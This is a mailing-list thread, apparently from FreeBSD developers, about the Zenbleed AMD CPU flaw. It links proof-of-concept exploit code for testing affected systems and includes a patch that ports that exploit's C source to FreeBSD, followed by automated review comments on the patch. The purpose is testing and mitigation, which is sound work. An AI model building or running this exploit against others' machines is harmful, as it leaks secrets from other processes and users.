On 23. 7. 27., Jung-uk Kim wrote:
> On 23. 7. 27., mike tancsa wrote:
>> On 7/26/2023 5:46 PM, Shawn Webb wrote:
>>> On Wed, Jul 26, 2023 at 08:34:56PM +0000, 0x1eef wrote:
>>>> Hello,
>>>>
>>>> I was curious if there are plans to apply the "chicken bit" workaround for the Ryzen line of processors. A firmware update is not scheduled to be released until Nov or Dec at the earliest. Thanks.
>>>
>>> For those that would like to test if their systems are affected, this proof-of-concept was reported to work on at least one system:
>>>
>>> https://git.hardenedbsd.org/shawn.webb/zenbleed/-/tree/shawn.webb/bsd/main
>>>
>>> Building it depends on gmake and nasm. You'll want to be on the shawn.webb/bsd/main branch.
>>
>> Thanks for that. Is there a way to compile on RELENG_12 or is it 13 only?
>>
>> % gmake
>> cc -O0 -ggdb3 -march=znver2 -c -o pattern.o pattern.c
>> pattern.c:15:10: fatal error: 'sys/sysinfo.h' file not found
>> #include <sys/sysinfo.h>
>>          ^~~~~~~~~~~~~~~
>> 1 error generated.
>> gmake: *** [<builtin>: pattern.o] Error 1
>
> I guess you checked out a wrong branch. Please see the attached minimal patch I made for FreeBSD. I think it will work on any supported FreeBSD branches. Note the original exploit is available from here:
>
> https://lock.cmpxchg8b.com/files/zenbleed-v5.tar.gz

With the forgotten attachment.

Jung-uk Kim
--- zenbleed/pattern.c.orig 2023-07-23 10:45:32.000000000 -0400 +++ zenbleed/pattern.c 2023-07-27 12:26:28.324346000 -0400 @@ -6,13 +6,14 @@ #include <stdbool.h> #include <x86intrin.h> #include <sched.h> +#ifdef __linux__ #include <syscall.h> +#endif #include <err.h> #include <pthread.h> #include <assert.h> #include <ctype.h> #include <signal.h> -#include <sys/sysinfo.h> #include "zenbleed.h" @@ -82,7 +83,7 @@ void * pattern_leak_consumer(void *param) } } - fprintf(stdout, "%.*s", matchlen, matchptr); + fprintf(stdout, "%.*s", (int)matchlen, matchptr); // If the match is bigger than our pattern size, we skip to the end of it. if (matchlen > patlen) { --- zenbleed/util.c.orig 2023-07-23 10:45:32.000000000 -0400 +++ zenbleed/util.c 2023-07-27 13:26:09.509588000 -0400 @@ -46,6 +46,9 @@ bool num_inrange(char *range, int num) bool num_inrange(char *range, int num) { char *r, *s, *e; +#ifndef __linux__ + size_t len; +#endif // Example: // 1,2,3,4-8,2 @@ -53,7 +56,14 @@ bool num_inrange(char *range, int num) if (range == NULL) return false; - s = strtok_r(strdupa(range), ",", &r); +#ifndef __linux__ + len = strlen(range) + 1; + s = alloca(len); + memcpy(s, range, len); +#else + s = strdupa(range); +#endif + s = strtok_r(s, ",", &r); while (s) { int start; --- zenbleed/zenbleed.c.orig 2023-07-23 10:45:32.000000000 -0400 +++ zenbleed/zenbleed.c 2023-07-27 13:07:27.502780000 -0400 @@ -6,13 +6,16 @@ #include <stdbool.h> #include <x86intrin.h> #include <sched.h> +#ifdef __FreeBSD__ +#include <pthread_np.h> +#else #include <syscall.h> +#endif #include <err.h> #include <pthread.h> #include <assert.h> #include <ctype.h> #include <signal.h> -#include <sys/sysinfo.h> #include "zenbleed.h" 
@@ -298,7 +301,7 @@ int main(int argc, char **argv) { } // We spawn a thread on every evailable core and start leaking to see what we get. - ncpus = get_nprocs(); + ncpus = sysconf(_SC_NPROCESSORS_ONLN); thread_arg_t* args = calloc(sizeof(thread_arg_t), ncpus); threads = calloc(sizeof(pthread_t), ncpus);
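Review bot: in main() in zenbleed.c, the result of `sysconf(_SC_NPROCESSORS_ONLN)` goes straight into both calloc() calls with no error check; sysconf() returns a long and -1 on failure, which turns into a very large size_t once it reaches calloc(). Suggest testing for a value below 1 and bailing out with err() (the file already includes <err.h>) before the allocations. The include hunk for this file does not add <unistd.h>, so confirm it is already pulled in outside the lines shown.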
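Review bot: in num_inrange() in util.c, the `#ifndef __linux__` / `#else` split keeps two copies of the same operation plus a conditionally declared `len`; the alloca() and memcpy() path is valid on Linux as well, so it could be used unconditionally and the strdupa() branch dropped. In either branch the copy is sized from strlen(range) with no upper bound, so a very long range argument is placed on the stack as-is; a length cap before the alloca(), or a heap copy freed after the loop, would remove that.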
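Review bot: the guards around <syscall.h> in the two include hunks do not match: pattern.c uses `#ifdef __linux__`, while zenbleed.c uses `#ifdef __FreeBSD__` with <syscall.h> in the `#else`, so a platform that is neither Linux nor FreeBSD still gets <syscall.h> in zenbleed.c. Using the same `__linux__` test for <syscall.h> in both files, with <pthread_np.h> under its own `__FreeBSD__` test, would keep them consistent. <sys/sysinfo.h> is also removed unconditionally from both files, which holds only if get_nprocs() was its sole use; a line in the commit message saying so would help.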